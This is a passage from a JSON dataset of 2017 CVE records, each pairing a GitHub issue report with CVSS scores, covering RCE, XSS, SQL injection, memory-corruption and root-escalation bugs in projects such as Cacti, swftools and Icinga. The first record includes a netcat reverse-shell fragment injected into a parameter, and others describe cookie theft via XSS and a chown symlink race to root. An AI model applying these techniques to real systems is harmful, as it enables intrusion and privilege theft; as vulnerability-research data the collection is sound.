        "description": "Critical vuln in cacti NUMBERTAG We (worlak2 and cibvetr2) found RCE vuln with black box fuzzing. APITAG APITAG in POST parameter path_rrdtool > _ nc e /bin/bash APITAG NUMBERTAG FILETAG NUMBERTAG Ater NUMBERTAG minutes we have backconnect shell FILETAG It\u2019s triggered after execute FILETAG in process. We think that because _$command_ not filtered in PATHTAG With regards worlak2 and cibvetr2",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2017-16651",
        "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6026",
        "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6026",
        "Repo_new": "roundcube/roundcubemail",
        "Issue_Created_At": "2017-11-06T10:45:29Z",
        "description": "File Disclosure Vulnerability. There is a zero day file disclosure vulnerability in the latest version of roundcube webmail which currently is being exploited by hackers to read roundcube's configuration files and steal its database credentials. It requires a valid username/password to login to a roundcube installation. I don't know how exactly should I report the details of this bug. Is there a proper way to privately send the details to roundcube's developers? Can I send the details to hello(at)roundcube(dot)net?",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16660",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/1066",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/1066",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2017-11-07T03:49:22Z",
        "description": "Local File Read and RCE in Cacti NUMBERTAG ds NUMBERTAG It requires admin privileges to reproduce the ploblem. After we login in with default account APITAG Local File Read NUMBERTAG Click Settings APITAG URLTAG URLTAG ,modify Cacti Log Path into APITAG NUMBERTAG isit URLTAG URLTAG , and you'll get the content of APITAG RCE NUMBERTAG Click Settings APITAG URLTAG URLTAG ,modify Cacti Log Path into Web Path like APITAG NUMBERTAG isit FILETAG and set http header APITAG into APITAG . Or exec cmd APITAG . The evil php code will been writen to PATHTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2017-16663",
        "Issue_Url_old": "https://github.com/pts/sam2p/issues/16",
        "Issue_Url_new": "https://github.com/pts/sam2p/issues/16",
        "Repo_new": "pts/sam2p",
        "Issue_Created_At": "2017-11-07T13:56:06Z",
        "description": "Integer Overflow in input bmp.ci. I found an integer overflow bug in input bmp.ci. in function APITAG URLTAG width height NUMBERTAG sizeof (unsigned char) would integer overflow there are NUMBERTAG places hace this problem: URLTAG URLTAG URLTAG here are the pocs which could crash sam2p: URLTAG URLTAG and screenshot for ASAN: URLTAG URLTAG patch method: check width height NUMBERTAG sizeof (unsigned char) before calc it",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16667",
        "Issue_Url_old": "https://github.com/bit-team/backintime/issues/834",
        "Issue_Url_new": "https://github.com/bit-team/backintime/issues/834",
        "Repo_new": "bit-team/backintime",
        "Issue_Created_At": "2017-11-07T18:22:38Z",
        "description": "Some 'notify send' arguments (filepath in errors/warnings) are treated as shell arguments. Backintime NUMBERTAG APITAG stable) Hi, this is a bug I noticed when trying to backup a file my user didn't have read permissions on. Normally a desktop notification ( FILETAG would be displayed containing the path of the problematic file. However in some cases, parts of the log message are treated as shell commands. For example ERRORTAG Other errors also trigger this bug (example with a filesystem error:) ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16711",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/46",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/46",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-11-09T12:44:31Z",
        "description": "A null pointer dereference bug of swfrender. A null pointer dereference bug of swfrender poc: URLTAG asan: URLTAG the problem is in the function uncompress URLTAG when function uncompress failed, this function will return NUMBERTAG URLTAG so the APITAG will return NUMBERTAG URLTAG data will be a NULL when construct it. void data = APITAG &width, &height); After that, gfximage_new will make a new struct in which the data is a NULL pointer. it caused a NULL pointer reference when calling fill_line_bitmap URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16762",
        "Issue_Url_old": "https://github.com/channelcat/sanic/issues/633",
        "Issue_Url_new": "https://github.com/sanic-org/sanic/issues/633",
        "Repo_new": "sanic-org/sanic",
        "Issue_Created_At": "2017-04-13T18:16:26Z",
        "description": "static file register arbitrary file read. File APITAG line NUMBERTAG we can see here is security check CODETAG but at the line NUMBERTAG in this file,the unquote function decoded file_path ERRORTAG we only need to \"/\" url coding can bypass the previous security check like this: FILETAG example of vulnerabilities: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16763",
        "Issue_Url_old": "https://github.com/bbengfort/confire/issues/24",
        "Issue_Url_new": "https://github.com/bbengfort/confire/issues/24",
        "Repo_new": "bbengfort/confire",
        "Issue_Created_At": "2017-11-10T01:52:48Z",
        "description": "APITAG method in class Configuration is vulnerable. class APITAG mysetting = True logpath = PATHTAG appname = APITAG settings = APITAG CONF_PATHS = [ PATHTAG The global configuration APITAG User specific configuration APITAG Local directory configuration ] PATHTAG APITAG Hi, there is a vulnerability in APITAG method in config.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16764",
        "Issue_Url_old": "https://github.com/illagrenan/django-make-app/issues/5",
        "Issue_Url_new": "https://github.com/illagrenan/django-make-app/issues/5",
        "Repo_new": "illagrenan/django-make-app",
        "Issue_Created_At": "2017-11-10T02:25:54Z",
        "description": "read_yaml_file method is vulnerable. from APITAG import read_yaml_file yaml_raw_data = APITAG PATHTAG APITAG Hi, there is a vulnerability in read_yaml_file methods in io_utils.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16785",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/1071",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/1071",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2017-11-10T11:22:40Z",
        "description": "Reflected XSS in NUMBERTAG We (worlak2 and cibvetr2) found Reflected XSS vuln in last version APITAG example we found in Google host with last version of cacti) APITAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-16793",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/47",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/47",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-11-10T13:04:12Z",
        "description": "A heapoverflow bug of wa NUMBERTAG swf.. A heapoverflow bug of wa NUMBERTAG swf. poc: URLTAG asan: URLTAG Bug occured in file APITAG Function wav_convert2mono does not check the size and align in wav sample properly, which causes samplelen equal to NUMBERTAG while size less than align. URLTAG Thus, the argument to the function malloc will less than we expect, which is only NUMBERTAG bytes. URLTAG Later, in the for loop, it will cause heap buffer overflow. Here the varible src >size is NUMBERTAG b NUMBERTAG a, which makes pos2 much more larger than NUMBERTAG URLTAG Patch Suggestion: Check size and align.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16794",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/50",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/50",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-11-10T16:22:47Z",
        "description": "A heapoverflow bug of png2swf.. A heapoverflow bug of png2swf. poc: URLTAG asan: URLTAG png_read_header parameter a is a char type, and header >bpp is an int type when a is NUMBERTAG the header >app will become NUMBERTAG ffffff NUMBERTAG by the evaluate operation URLTAG when using bpp, the pos will become a really big number, which caused the heap overflow URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16796",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/51",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/51",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-11-12T09:09:05Z",
        "description": "3 bugs of png2swf. bug NUMBERTAG atribute write caused by a logic bug In function png_load, there is no check for realoc. If the result of realloc is NUMBERTAG the data will be written into address zimagedatalen. We could control the value of zimagedatalen to achieve atribute write. URLTAG URLTAG bug NUMBERTAG crash caused by a logic bug In fuction png_read_chunk, there is no check for malloc. If malloc failed, destdata NUMBERTAG fread will write address NUMBERTAG and crash the binary. URLTAG URLTAG bug NUMBERTAG integer overflow > heapoverflow In function png_load, both header,width and APITAG are NUMBERTAG bytes, and alleclen NUMBERTAG is NUMBERTAG bytes. header,width APITAG NUMBERTAG may be greater than NUMBERTAG bytes, which caused integer overflow. Further can cause heap overflow. URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16801",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3915",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3915",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2017-11-13T03:07:06Z",
        "description": "Step Template Name XSS Vulnerability. There is a XSS vulnerability in the step template name, when either importing or adding a custom step template. Refer to: URLTAG Also see: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-16805",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/8813",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8813",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-11-08T20:34:24Z",
        "description": "Invalid read in APITAG Invalid read in APITAG Git HEAD: APITAG Crashing testcase in URLTAG Command: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16808",
        "Issue_Url_old": "https://github.com/the-tcpdump-group/tcpdump/issues/645",
        "Issue_Url_new": "https://github.com/the-tcpdump-group/tcpdump/issues/645",
        "Repo_new": "the-tcpdump-group/tcpdump",
        "Issue_Created_At": "2017-11-12T19:13:50Z",
        "description": "Heap Overread triggered by sending specific packets over a interface being monitored by APITAG as well as while trying to parse the pcap file of these packets. There seems to be a heap based buffer overread while running tcpdump on a crafted pcap file. A similar behavior is seen when tcpdump is listening on an interface and the contents of this file is relayed over the network. In order to trigger the vulnerability, run APITAG The relevant APITAG output: The memcheck output has been attached because it was too long. _memcheck APITAG FILETAG Debug info: Tcpdump version: APITAG Libcap version: libpcap NUMBERTAG OS: Ubuntu NUMBERTAG Compiler: gcc NUMBERTAG Target NUMBERTAG linux gnu Hexdump of Input: CODETAG I performed some analysis with gdb to identify what was causing the issue. On adding a breakpoint in main and the function ether_print using: CODETAG GDB gave the following output: ERRORTAG Values after code execution APITAG When the breakpoint reaches the second time. APITAG ep has no values, and the fetching fails on APITAG CODETAG Looks like a heap overread is happening resulting in NULL or garbage values. Note that running Tcpdump without Memcheck doesn\u2019t result in a crash: APITAG : ERRORTAG Valgrind Network Output : The network memcheck output has been attached because it was too long. _memcheck APITAG FILETAG Credits for discovering the potential memory error goes to MENTIONTAG I performed the analysis and designed the POC for tcpdump on both the pcap file as well as on the network. PS Sorry for the long ish bug report.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16810",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3919",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3919",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2017-11-14T00:28:58Z",
        "description": "XSS vulnerability in the All Variables tab. See URLTAG source: URLTAG Steps to recreate NUMBERTAG Create a new variable set NUMBERTAG Put your XSS payload in the name of the variable set, for example: ERRORTAG FILETAG NUMBERTAG Add a variable to your variable set, can be anything you want FILETAG NUMBERTAG Add your variable set to an existing or new project FILETAG NUMBERTAG iew APITAG Variables\" on your project FILETAG NUMBERTAG SS payload fires repeatedly",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-16820",
        "Issue_Url_old": "https://github.com/collectd/collectd/issues/2291",
        "Issue_Url_new": "https://github.com/collectd/collectd/issues/2291",
        "Repo_new": "collectd/collectd",
        "Issue_Created_At": "2017-05-18T22:56:47Z",
        "description": "SNMP table . Version of collectd NUMBERTAG bpo NUMBERTAG from debian jessie backports repo Operating system / distribution: debian NUMBERTAG jessie Expected behavior I am polling connected clients across about NUMBERTAG ubiquiti access points from the SNMP Station table. A few of the Access points have NUMBERTAG clients, and therefore return nothing. If the instance string returns nothing it should gracefully log(optional) and move on to the next task. Actual behavior After much testing I narrowed it down to a single access point which I realized had no clients attached. With only that client configured I get the double free or corruption error. collectd T Error in `collectd': double free or corruption (!pre NUMBERTAG dd NUMBERTAG Aborted If the instance OID returns no data it dies here. Configs to reproduce my_types.db >ubnt_rm5_sta signal:GAUGE:U:U, noisefloor:GAUGE:U:U, ccq:GAUGE:U:U, amq:GAUGE:U:U, amc:GAUGE:U:U snmp APITAG APITAG snmp> > APITAG \"stations\"> > Type \"ubnt_rm5_sta\" > Table true > Instance APITAG > Values APITAG APITAG APITAG APITAG APITAG > APITAG > > APITAG \"ubnt rm5 allstate N NUMBERTAG Address APITAG > Version NUMBERTAG Community \"public\" > Collect \"stations\" > APITAG > APITAG Extra info from the mib for what I'm polling. >snmptranslate m PATHTAG Tz | grep APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Let me know if you need any more information.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-16821",
        "Issue_Url_old": "https://github.com/b3log/symphony/issues/503",
        "Issue_Url_new": "https://github.com/b3log/symphony/issues/503",
        "Repo_new": "b3log/symphony",
        "Issue_Created_At": "2017-11-14T15:44:01Z",
        "description": "Cross Site Scripting vulnerability in user center. Hi,man.I found a Cross Site Scripting vulnerability in user center First ,my test environment OS : APITAG NUMBERTAG Browser : APITAG Data : APITAG NUMBERTAG PM Second ,vulnerability details I built a program with symphony. Location : PATHTAG userid Exploit Method : APITAG a account APITAG IP(symphony is based on X Forwarded For to get the IP),so i can change the content of the HTTP Headers X Forwarded APITAG content is xss payload APITAG . APITAG APITAG to your account based on the above steps NUMBERTAG If admin edit your user APITAG is triggered NUMBERTAG Administrator perspective : APITAG Xss payload alert : APITAG Third,others This vulnerability can get Administrator's APITAG can be imagined. Vulnerability Reporter : vulkey(mstsec)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-16834",
        "Issue_Url_old": "https://github.com/lingej/pnp4nagios/issues/140",
        "Issue_Url_new": "https://github.com/lingej/pnp4nagios/issues/140",
        "Repo_new": "lingej/pnp4nagios",
        "Issue_Created_At": "2017-11-02T17:20:33Z",
        "description": "Root privilege escalation via insecure config permissions. I think pnp4nagios has the same problem as nagios core: URLTAG Since the same sort of APITAG are used, we wind up with e.g. APITAG and in particular APITAG owned by the \"nagios\" (or \"icinga\", or whatever) user. However, the contents of APITAG are sensitive: if the \"nagios\" user can edit them, he can remove, APITAG and set APITAG Afterwards, anything he can make npcd do, will be done as root. The fix is probably the same: I think everything under APITAG should be owned by root instead of by the nagios user/group. I'm not a pnp4nagios expert, though, so there may be problems with that approach that I'm unaware of. What happens if we just drop APITAG ?",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16868",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/52",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/52",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-11-13T00:08:03Z",
        "description": "An integer overflow bug of wa NUMBERTAG swf. URLTAG when malloc. there is an integer overflow bug: (samplelen ratio NUMBERTAG that make the malloc failed. so samples is NUMBERTAG URLTAG when memcpy use samples\uff0cit cause a null pointer dereference bug memcpy(samples2, samples, numsamples sizeof(U NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16869",
        "Issue_Url_old": "https://github.com/upx/upx/issues/146",
        "Issue_Url_new": "https://github.com/upx/upx/issues/146",
        "Repo_new": "upx/upx",
        "Issue_Created_At": "2017-11-15T06:23:41Z",
        "description": "SIGSEGV checking corrupted Mach O file APITAG APITAG What's the problem (or question)? SIGSEGV in upx when packing the segfault macho input file in the attached FILETAG . APITAG APITAG (this NUMBERTAG b NUMBERTAG at APITAG NUMBERTAG if (lc_seg == segptr >cmd) { Accessing illegal memory in register rdx. What should have happened? Program received signal SIGSEGV, Segmentation fault. Do you have an idea for a solution? How can we reproduce the issue NUMBERTAG upx segfault macho NUMBERTAG Please tell us details about your environment. UPX version used ( APITAG ): up NUMBERTAG git NUMBERTAG a NUMBERTAG d9b NUMBERTAG UCL data compression library NUMBERTAG zlib data compression library NUMBERTAG LZMA SDK version NUMBERTAG Host Operating System and version: Ubuntu NUMBERTAG linu NUMBERTAG Host CPU architecture NUMBERTAG Target Operating System and version: Mac OS Target CPU architecture NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16881",
        "Issue_Url_old": "https://github.com/b3log/symphony/issues/504",
        "Issue_Url_new": "https://github.com/b3log/symphony/issues/504",
        "Repo_new": "b3log/symphony",
        "Issue_Created_At": "2017-11-18T09:01:37Z",
        "description": "Account avatar link exists XSS vulnerability too.. Hi,man.I hope you can learn by analogy. You filtered xss vulnerability in user APITAG just one place. There is a xss vul in account avatar link. I can enter xss payload APITAG at the avatar link. My test environment OS : APITAG NUMBERTAG Browser : APITAG Tool : APITAG Data : APITAG NUMBERTAG PM Vulnerability details Location : /settings/avatar I setting my avatar,use APITAG capture some HTTP Requests packets: APITAG Analysis packets First packet info: Mthod : POST URI : /upload Content : I uploaded the picture content Second packet info: Mthod : POST URI : /settings/avatar Content : JSON Requests > APITAG When I analyzed the second packet, I knew the process of uploading the avatar. So,i just need to tested the second packet.I changed the value of the JSON parameter APITAG to xss payload APITAG . APITAG Attack When person look my avatar, I can get their cookies. APITAG Come on, my good friend.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-16882",
        "Issue_Url_old": "https://github.com/Icinga/icinga-core/issues/1601",
        "Issue_Url_new": "https://github.com/icinga/icinga-core/issues/1601",
        "Repo_new": "icinga/icinga-core",
        "Issue_Created_At": "2017-11-18T01:03:42Z",
        "description": "Root privilege escalation via insecure permissions. Hello, Unfortunately icinga core has the same problem with its installed permissions that nagios core has, reported in URLTAG The following executables are installed owned by the _icinga_ user: APITAG APITAG APITAG APITAG and likewise with the config files at least the following are vulnerable: APITAG APITAG (yeah, it's a sample, but better safe than sorry) The executables are exploitable because _icinga_ can edit them and _root_ will run them; the configs are vulnerable because _icinga_ can edit them to give the daemons instructions and then insist that those daemons run as _root_. The good news for you, potentially, is that maybe you don't care about maintaining compatibility with Nagios XI, and can set APITAG to APITAG . My personal instinct would be to drop the APITAG all around, and then give the icinga user write permission only on those directories it needs. If somebody wants to manage the configs other than icinga.cfg with a dedicated, non _icinga_ group then he could do that either on his own or potentially with a new APITAG flag.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16883",
        "Issue_Url_old": "https://github.com/libming/libming/issues/77",
        "Issue_Url_new": "https://github.com/libming/libming/issues/77",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2017-06-08T16:29:18Z",
        "description": "invalid memory read in APITAG . On libming latest version, an invalid memory read was found in function APITAG . ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-16890",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/57",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/57",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2018-07-08T03:37:23Z",
        "description": "divide by zero exception in wav_convert2mono in wav.c. one divide by zero exception in wav_convert2mono in wav.c which allows attacker to cause a denial of service. poc file: FILETAG To reproduce: ./wa NUMBERTAG swf o output $poc APITAG APITAG NUMBERTAG ERROR: APITAG FPE on unknown address NUMBERTAG e NUMBERTAG pc NUMBERTAG e NUMBERTAG bp NUMBERTAG ffea NUMBERTAG e NUMBERTAG sp NUMBERTAG ffea NUMBERTAG aa0 T NUMBERTAG e NUMBERTAG in wav_convert2mono PATHTAG NUMBERTAG ebc NUMBERTAG in main PATHTAG NUMBERTAG f2f0dd NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG c8 in _start ( PATHTAG )",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16893",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/804",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/804",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2017-11-20T06:00:15Z",
        "description": "a SQL injection in version NUMBERTAG SQL injection in version NUMBERTAG in FILETAG CODETAG values of the edit_list parameters are not sanitized; these are used to construct a SQL query and retrieve a list of registered users into the application. so post the data FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-16898",
        "Issue_Url_old": "https://github.com/libming/libming/issues/75",
        "Issue_Url_new": "https://github.com/libming/libming/issues/75",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2017-06-07T14:59:00Z",
        "description": "global buffer overflow in APITAG On libming latest version, a global buffer overflow was found in function APITAG CODETAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16919",
        "Issue_Url_old": "https://github.com/RamonSilva20/mapos/issues/81",
        "Issue_Url_new": "https://github.com/ramonsilva20/mapos/issues/81",
        "Repo_new": "ramonsilva20/mapos",
        "Issue_Created_At": "2017-11-21T02:00:26Z",
        "description": "Ordens de Servi\u00e7o Stored Cross site Scripting (XSS). Ol\u00e1, gostaria de reportar uma falha de stored cross site scripting na funcionalidade de visualizar clientes. A falha encontra se no campo Descri\u00e7\u00e3o da ordem de servi\u00e7o. Quando um administrador visualiza um cliente que tem ordem de servi\u00e7o em aberto, caso haja c\u00f3digo javascript no campo descri\u00e7\u00e3o dessa ordem de servi\u00e7o, esse c\u00f3digo \u00e9 executado. Para checar at\u00e9 a falha, \u00e9 necess\u00e1rio seguir os passos abaixo NUMBERTAG Registrar um cliente em URLTAG NUMBERTAG Logar com o cliente registrado e adicionar uma ordem de servi\u00e7o, dentro do campo descri\u00e7\u00e3o inserir um javascript qualquer, por exemplo: APITAG alert('xss'); APITAG NUMBERTAG Em seguida logar com o usu\u00e1rio administrador, ir em Clientes e visualizar o novo cliente registrado. O c\u00f3digo inserido no passo NUMBERTAG ser\u00e1 executado.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-16933",
        "Issue_Url_old": "https://github.com/Icinga/icinga2/issues/5793",
        "Issue_Url_new": "https://github.com/icinga/icinga2/issues/5793",
        "Repo_new": "icinga/icinga2",
        "Issue_Created_At": "2017-11-23T01:52:28Z",
        "description": "Root privilege escalation via prepare dirs (init script and systemd service file). The APITAG file calls chown unsafely, leading to a root exploit for the APITAG . The tl;dr is that it's never safe to call chown as root, unless the target and all directories above it are controlled wholly by root. A few uses of chown in APITAG are exploitable; here's an example: CODETAG The first line gives away ownership of the directory containing the APITAG , and the next line calls chown on that file. The exploit is that, after the first line executes, the APITAG can simply replace APITAG with a link (sym _or_ hard) to a root owned file. The call to chown will then change ownership of the link's _target_. That is easily exploitable to gain root, by taking ownership of e.g. APITAG or root's APITAG file. To exploit this the first time the service is started, you need to take advantage of the race condition to create a link before the APITAG test is executed. However, there's a much easier scenario: if the service is started, stopped, and started again (even across reboots, for persistent directories), then the APITAG test will succeed, and call chown on a path that has been controlled by APITAG since the first time the service was started. As for the fix, I would entirely eliminate the ability to change the value of APITAG and APITAG at runtime, since there is no safe way for you to fix the permissions after it is changed. Once those variables are eliminated, you don't need to call chown on the directories or files: the directories can be created with the correct ownership by make install , and the files will be owned by the user who creates them (namely the icinga runtime user, who will be the one writing to them, and that user will never change). If you would rather keep those variables, just let the init/service script crash if the permissions are wrong. Users will have to be responsible for fixing the 